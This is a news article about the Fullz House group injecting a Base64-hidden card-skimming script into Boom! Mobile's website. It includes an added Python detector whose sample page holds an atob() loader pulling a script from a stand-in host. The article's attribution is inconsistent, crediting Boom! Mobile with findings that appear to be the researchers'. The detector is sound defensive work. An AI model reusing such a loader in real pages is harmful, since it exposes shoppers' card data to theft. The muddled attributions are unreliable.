Fullz House Hacker Group Hacked Mobile Provider to Steal Credit Card Data

The Fullz House hacker group recently compromised the mobile provider Boom! Mobile to steal credit card data. The group injected a credit card stealer script into the provider's website.

Boom! Mobile provides postpaid and prepaid no-contract wireless service plans that let its customers use the lines of the nation’s largest cellular networks, including AT&T, T-Mobile, and Verizon.

According to the Malwarebytes report, this type of compromise is known as a Magecart attack. The experts asserted that the attackers injected malicious JavaScript into one or more sections of a compromised website.

The attackers then use these scripts to steal the payment or personal data that the site's customers submit with their e-commerce orders.

Odd victim

Boom! Mobile is an odd victim, as it is a wireless provider that sells mobile phone plans running on the big networks. The Oklahoma-based business advertises excellent customer service, transparency, and no contracts.

Boom! Mobile affirmed that their crawlers detected that their website, boom[.]us, had been infected with a one-liner containing a Base64-encoded URL that loads an external JavaScript library.
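
A defender-side check for the pattern described above, as an added example that is not from the Malwarebytes report or the original article: it scans page source for quoted Base64 literals that decode to URLs and marks hosts outside an allowlist. The function names, the allowlist and the `.example` hosts in the sample page are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlsplit

# Quoted runs of 16+ Base64 characters, with optional padding.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")

def decode_url(literal):
    """Return the http(s) URL a Base64 literal decodes to, or None."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii").strip()
        if text.startswith("//"):  # protocol-relative script URL
            text = "https:" + text
        parts = urlsplit(text)
    except ValueError:  # bad Base64, non-ASCII bytes or malformed URL
        return None
    if parts.scheme in ("http", "https") and parts.hostname:
        return text
    return None

def find_hidden_script_urls(page_source, allowed_hosts):
    """List Base64-hidden URLs in page source, marking unapproved hosts."""
    findings = []
    for match in B64_LITERAL.finditer(page_source):
        url = decode_url(match.group(1))
        if url is not None:
            host = urlsplit(url).hostname
            findings.append({"url": url, "host": host,
                             "allowed": host in allowed_hosts})
    return findings

def _b64(text):
    return base64.b64encode(text.encode()).decode()

# Constructed sample: one normal script tag, one harmless Base64 token and
# one script URL hidden behind atob(). All hosts are made-up .example names.
SAMPLE_URL = "https://cdn-libs.example/assets/app.js"
SAMPLE_PAGE = (
    '<script src="https://static.shop.example/js/cart.js"></script>\n'
    '<script>var token="' + _b64("session-token-0123456789") + '";</script>\n'
    '<script>var s=document.createElement("script");'
    's.src=atob("' + _b64(SAMPLE_URL) + '");document.head.appendChild(s);</script>\n'
)

if __name__ == "__main__":
    for f in find_hidden_script_urls(SAMPLE_PAGE, {"static.shop.example"}):
        print("ok" if f["allowed"] else "REVIEW", f["host"], f["url"])
```

Run against the rendered checkout pages of a site you operate; any finding whose host is not on the allowlist is worth a manual look, since legitimate pages rarely hide script URLs behind Base64.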

Fullz House Hacker group 

Boom! Mobile also said that they recognized this domain and code from a previous incident in which the attackers used decoy payment portals set up like phishing pages.

RiskIQ also tracked this group and gave it the nickname “Fullz House” because of its practice of using carding sites to resell the data. “Fullz” is a term criminals use for full data packages taken from victims.

Boom! Mobile noticed a number of new domains that were registered in late September and follow the same pattern. The group has been very powerful and productive, and it continues a well-established pattern that was seen a year ago.

The security experts reported the incident to Boom! Mobile via both live chat and email, but they had not received a reply at the time of writing. This implies that the Boom! Mobile website is still compromised and that all of its online shoppers are still at risk.

Skimmer domains


The threat actor groups under the Magecart umbrella continue to target and steal payment card data with their so-called software skimmers. Security researchers have observed the activity of these groups since at least 2010.

This means that Boom! Mobile is not the only target; the threat actors have many more. According to one joint report, many groups are more advanced than others; in particular, the gang tracked as Group 4 appears to be very sophisticated.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.